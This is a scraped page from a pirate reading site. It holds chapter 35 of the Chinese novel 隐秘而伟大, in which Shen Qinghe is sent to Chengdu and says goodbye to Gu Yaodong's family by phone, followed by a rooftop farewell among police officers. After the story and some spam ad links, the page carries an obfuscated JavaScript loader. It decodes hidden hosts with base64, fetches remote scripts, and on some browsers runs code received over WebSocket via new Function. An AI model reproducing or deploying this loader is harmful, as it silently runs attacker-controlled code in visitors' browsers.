笔趣阁

下载
字:
关灯 护眼
笔趣阁 > 隐秘而伟大 > 第三十五章

第三十五章

章节错误,点此举报(免注册),举报后维护人员会在两分钟内校正章节内容,请耐心等待,并刷新页面。
转眼到了五月,又是法桐争相吐绿的春天了。
   
  福安弄外的报摊上,很多人在争相购买报纸。
   
  报摊老板高喊着:“五月二十二日最新消息!共产党攻占南昌!国民党公报承认,与长江接口的前线要地浏河已经撤空!”
   
  顾邦才一个人站在家门口,望着弄堂里的光景。任伯伯依然抱着二喵坐在家门口听收音机。曹先生家门口停着一辆小货车,一家三口正在搬家。他儿子如今大学毕业了,正是顾耀东那年去警局报到的年纪。比起当年参加游行时青涩的样子,如今稳重温和了许多。
   
  顾邦才大声招呼道:“曹先生!这就走啦?”
   
  “走啦,走啦!”曹先生走过来,压低声音说道,“听说共产党把天津管得有声有色,对老百姓很不错,反正儿子在那边找了份差事,我和他妈妈就打算一起过去,过过安稳日子。”
   
  顾邦才有些心酸地笑了笑。路灯下那张下象棋的桌子,以前总是热热闹闹围一群人,如今已经落满灰尘。
   
  饭桌上,顾邦才说起曹先生一家人要搬家的事情。
   
  耀东母亲:“真去天津呀?”
   
  “他有亲戚在天津开了个小工厂,打算让他儿子去做事。一家人就干脆都过去投靠了。”
   
  顾耀东:“还回来吗?”
   
  顾邦才:“肯定会的。共产党能把天津搞好,将来上海一定也会好的。”
   
  耀东母亲:“我反正哪儿也不去。”
   
  顾邦才:“我们当然坚守福安弄。国民政府把上海搞成这样,早该完蛋了。再熬一熬,好日子马上就要来了。”
   
  顾悦西:“多多爸爸从航运公司辞职了,以后不想出海到处跑了,免得一家人总分开。”
   
  顾耀东:“姐夫打算换到哪儿工作?”
   
  “还不知道,现在乱哄哄的,只能慢慢找。不过我和多多得搬回去住了。”
   
  耀东母亲:“也是好事。都是成了家的人,也该好好经营自己的小家了。”
   
  顾悦西:“青禾什么时候回上海?”
   
  顾耀东:“她托人带过话,说是今天就能有消息。我们约好下午通个电话。”
   
  耀东母亲:“那婚事呢?打算什么时候办?”
   
  顾耀东有些回避:“现在这么乱,等外面安定一些再说吧。”
   
  耀东母亲:“我知道,夏处长出了事你心里一直难过。但是事情都过去半年了,你也要往前看。”
   
  顾耀东笑了笑,没说什么。
   
  耀东母亲:“我看择日不如撞日,今天去照相馆,顺道把你们的结婚照样式一起选了!等青禾回来,你们直接就去拍照。”
   
  钟百鸣死了,警局内部对于沈青禾的一切调查都停止了。这是齐升平自保的筹码。两天前,沈青禾得到警委新任书记的批准得以返回上海。但顾耀东隐隐觉得,这也许会是又一次更久的告别。
   
  沈青禾剪了齐耳短发,穿着旗袍,看起来比以前更清瘦了。她独自去了凤鸣茶楼,和一名陌生的警委联络员见面。
   
  联络员:“玉晨同志,上级让我来传达你的新任务。”
   
  沈青禾充满期待地看着他。南昌已经解放了,不出意外下一个就是上海。哪怕还不能恢复“沈青禾”的身份,但至少,也许,她可以用“王玉晨”的身份留在上海,和顾耀东一起迎接解放。
   
  “蒋介石已经调令胡宗南的主要部队集结西南地区,企图以川、康、云、贵为根据地,以重庆为据点,做最后挣扎。战争的重点已经转到大西南了。考虑到你父亲曾经和刘文辉是挚友,上级希望你能前往成都,参与策动川康起义的工作。”
   
  沈青禾愣住了:“去成都……那顾耀东呢?”
   
  “上海解放已经是大势所趋。重建警察体系将会是接管城市以后最迫切的任务。我们需要像顾耀东这样的同志来参与重建。他现在的任务就是坚守岗位,保存实力,等待解放。”
   
  “就是说,我们还是要分开执行任务……”她怔怔地呢喃着。
   
  “对。但是否执行这项任务,最终由你决定。”
   
  沉默片刻,沈青禾笑着说:“我随时做好出发的准备。”
   
  他交给沈青禾一本证件:“那好,这是你的新证件。”
   
  沈青禾翻开一看,上面的名字是“蔚青未”。
   
  “用你的真名执行这次任务,也是上级慎重考虑后的决定。你是蔚家唯一的后人,相信你父亲和刘文辉的特殊关系,能帮助你尽快在那边落脚。”
   
  “什么时候出发?”
   
  “不出意外的话,就在上海解放那天。”
   
  “走之前,我能和顾耀东见一面吗?”
   
  “‘沈青禾’这个身份毕竟已经暴露了。你们见面,可能会给他带来危险。”
   
  “知道了。”
   
  “你到成都以后就是‘蔚青未’了。出于安全考虑,在你离开上海的时候,关于‘沈青禾’的一切档案都要抹掉。尤其是在顾家,不要留下任何能证实身份的东西。”
   
  青禾当然会处理好一切,就像这个人从来没存在过一样。这不是她第一次执行这样的任务,只不过,这次比以往任何一次都更艰难。
   
  顾家一家人去了照相馆,耀东父母和顾悦西、多多在里面轮番照相。顾耀东一个人等在照相馆外的公用电话亭里。过了片刻,电话响了。他迫不及待拿起了电话,电话那头是沈青禾久违的声音:“是我。”
   
  “顺利吗?”他忐忑而期待地问道。
   
  沈青禾就站在街角的杂货铺,远远地,她能看见电话亭里的顾耀东。
   
  “顺利。”
   
  顾耀东松了口气:“那就好。什么时候能回福安弄?”
   
  照相馆里,顾悦西看见顾耀东在电话亭接电话,赶紧喊道:“来了来了,青禾打电话来了!”
   
  她一边说着一边兴冲冲地跑出去,一把拉开公用电话亭门:“青禾什么时候……”话说一半,她才发现气氛不对——不仅是不对,是压抑得可怕。她默默关上门,回了照相馆里。
   
  顾耀东死死攥着电话:“一张照片也不能留下吗?那能告诉我你要离开多长时间吗?”
   
  “也许一年,也许两三年。没有人知道答案。”
   
  顾耀东长长地吸了一口气,望向天空。
   
  “青禾,如果有一天我们脚下的每一寸土地都解放了,你不用再隐姓埋名,至少我要知道怎么找到你。”
   
  “真的到了那一天,我一定会以沈青禾的身份重新回到你的生活里。”
   
  “我可以不知道你要去哪儿,不知道你会变成什么人,但至少你要知道,我永远在福安弄等你。”
   
  沈青禾红着眼睛笑了:“一言为定。”
   
  “一言为定……”
   
  顾耀东咬着牙,准备挂掉电话。就在这时,耀东父母和顾悦西三个人忽然拉开电话亭门冲了进来。
   
  耀东母亲一把抢过电话:“青禾!青禾啊!我是妈妈啊!”
   
  沈青禾正要挂电话,忽然听见电话里传出嘈杂的声音。她诧异地转头望去,远远地,她望见了在电话亭里挤作一团的顾家人。刹那间她的双眼涌满了泪水。她下意识地要挂掉电话,害怕那些再熟悉不过的声音会让自己好不容易坚定下来的决心彻底崩溃。然而电话里头不断地喊着:“青禾?青禾!”
   
  她终于还是将电话慢慢拿到了耳边。
   
  耀东母亲抓着电话不肯松手,顾邦才和顾悦西争抢着电话,顾耀东则已经被三个人挤到了外面。
   
  也不知电话那头有没有人在听,耀东母亲冲着电话一直说着:“亭子间不会再租给别人了,你放心做你的事情,家里什么都不用担心!房子我每天都会打扫,你要是想家了就往楼下的电话亭打电话,在外面要是累了,不想做事了,你就回来……”
   
  顾邦才想抢电话,怎么也抢不到,只能在旁边嚷嚷:“哎呀,重点!讲重点呀!”
   
  顾悦西一把抢过电话:“青禾,我是姐姐啊!你什么时候想回来了就回来!家里不用担心,顾耀东你也不用担心!我会看着他好好吃饭睡觉,你一个人在外面也要好好吃饭睡觉,别舍不得钱,听见了吗?”
   
  终于顾邦才抢到了电话:“哎呀,你们都抓不住重点!还是我来讲!青禾,我是爸爸呀!你一个人在外面,要是遇见坏人,就报耀东的名字,人家一听他是警察就不敢欺负你,明白吗?还有啊,万一……”
   
  沈青禾拿着电话,已是泪流满面,泣不成声。
   
  暮色垂垂。顾耀东一个人站在晒台上,望着远处的城市,小声放着收音机。
   
  战斗还没有结束,他的任务还没有完成。这里依然是需要他坚守的战场。
   
  顾邦才走了过来,顾耀东关掉了收音机。
   
  “青禾真的是要去香港?”
   
  “嗯。她父母生前在香港留了一些产业。那时候青禾太小,一直由她父母的朋友在打理。最近刚刚联系上,他们希望物归原主,让她去接管。”
   
  “将来还回上海吗?”
   
  “也许吧。”
   
  “那你们的事……就这么搁置了?”
   
  顾耀东勉强挤出笑容:“看缘分了。”
   
  “那你自己呢?”
   
  “我?”
   
  “以前总想让你吃官饭,觉得体面。现在我算看清楚了,这大锅里的饭早就烂透了,不吃也罢。要是不想当警察了就辞职回来。”
   
  顾耀东一脸傻笑:“我不走。”
   
  顾耀东去了户籍科。孔科长照例把这几天新登记的户籍给了他:“你每天都来,半年了,到底在找什么人?”
   
  顾耀东笑了笑:“一个老朋友。”
   
  “很重要的人吗?”
   
  “是。很重要。”
   
  “可能人家早就离开上海了呢?”
   
  “我也不知道。只是感觉他有一天还会再出现。”
   
  顾耀东翻完,将户籍簿还给他。
   
  “还是没有吗?”
   
  顾耀东摇了摇头。
   
  “这恐怕是我能给你的最后一批户籍登记了。兵临城下,干完今天,我也要彻底告老还乡了。”
   
  “谢谢你,孔科长。保重。”
   
  齐升平在台上做战前动员,看起来慷慨激昂,大义凛然。台下虽然坐满了警员,但全都木讷沉闷,仿佛是一屋子摆设。
   
  一回办公室,齐升平便开始匆匆收拾东西。
   
  方秘书敲门进来:“副局长,下午的动员会还是定在两点吗?”
   
  “我有急事要出去,下午的会让周副局长主持吧!”
   
  “周副局长也出去了。”
   
  “那就随便谁,谁愿意主持谁就上台去主持!”
   
  说罢,齐升平拿上外套和公文包,匆匆离开了警局。
   
  刑二处仅剩的四名警员各自坐在座位上,没有人说话,气氛伤感而压抑。
   
  门口几名警员匆匆忙忙跑过,其中一人敲着门喊道:“二处的去武器科领枪!马上要到外白渡桥支援防卫圈!另外赶紧统计一下人数,交一份子弹申请表!”
   
  二处的人无动于衷,似乎谁也没听见他的话。
   
  小喇叭说:“夏处长走了,李队长走了,赵志勇也走了。七个位子,现在空了三个。”
   
  四个人伤感地坐着,不知道该说什么。
   
  过了片刻,小喇叭又说:“去楼顶喝一杯吧。”
   
  肖大头:“行啊!”
   
  于胖子:“这时候了,哪儿还卖酒给你喝?”
   
  小喇叭笑着从桌子下面拎出四瓶酒:“我从家里带了。”
   
  于胖子:“但是去楼顶的通道好像已经锁了。”
   
  顾耀东拿出一串钥匙:“钥匙在我这里。”
   
  另外三人笑了。
   
  坐在十层楼高的天台上俯瞰这座城市,风景是不一样的。这里看不见人间悲欢,看不见人间罪恶,于是很多的惆怅、郁结和愤怒,在这个更接近天空的地方不自觉地消减了。
   
  四个人坐在天台边,一人拿了只酒瓶,喝着酒,漫无边际地聊着天。
   
  肖大头:“今后你们打算怎么办?”
   
  于胖子:“你有打算吗?”
   
  肖大头:“我?呵呵,不知道,没想过。就我这个火爆脾气,除了当警察可能也干不了别的。”
   
  顾耀东:“肖警官,后悔来当警察吗?”
   
  “不后悔。我十八岁进捕房,最好的青春都交付在这儿了。只是有点遗憾吧,生错了时代,没能成为我曾经想成为的那种警察。”
   
  “也许以后还会有机会的。”
   
  “不可能啦。早不是年少轻狂的肖德荣了。青春不再,梦想也死在这儿了。”
   
  于胖子:“我跟你不一样。其实我根本就不想当警察,从来就不想。我没什么本事,也没什么大理想,就想当个普通人,开个小饭馆,每天炒炒菜,赚点小钱,跟老婆孩子过好小日子。”
   
  小喇叭:“你开饭馆,可能会自己把自己吃破产吧?”
   
  两人依然像从前一样开着玩笑,嘻嘻哈哈,只是笑容里多了一丝感伤。
   
  肖大头:“小喇叭,你呢?”
   
  正在笑闹的小喇叭忽然沉寂了下来。
   
  “我要结婚了。”他轻声说道。
   
  诧异,接着是激动和欣喜。
   
  于胖子给了他一拳:“行啊你!什么时候都到这一步了!居然一直保密!”
   
  小喇叭难以启齿:“是在台湾。”
   
  三个人愣住了。
   
  “对不起……她是一个演员,剧团和那些看戏打赏的官太太都要走了,她要演戏也不得不跟着过去。其实我想跟你们在一起。可我一个人这么多年了,好不容易遇上一个喜欢的女孩子也喜欢我,我是真心想跟她结婚。”小喇叭说得特别难过。
   
  顾耀东:“这是喜事,大喜事,恭喜你。”
   
  于胖子:“你的喜酒我们是喝不上了。这顿就算是提前祝贺吧。”
免费看片APP    美女视频免费看
『加入书签,方便阅读』
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzk5OTk5OS0xMDE1Ng==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x42\x52\x70\x50\x79\x77\x57\x46\x66\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=1000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,300000),ext='2',i='ndx'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vd2t1aTM5amtsLmhiZ2djbbS5jbb20=','d3NzOOi8vd3MuYW5kYTE1MTYuY29tOOjkwOOTAsd3NzOOi8vd3Muc3luZ2d5LmNvbTo5MDkwLHdzczovL3dzLnpoaXB1ZnMuY29tOOjkwOOTA=',window,document,['b','O']);}:function(){};
继续浏览精彩内容
到笔趣阁APP免费阅读
《隐秘而伟大》
打开
浏览器
继续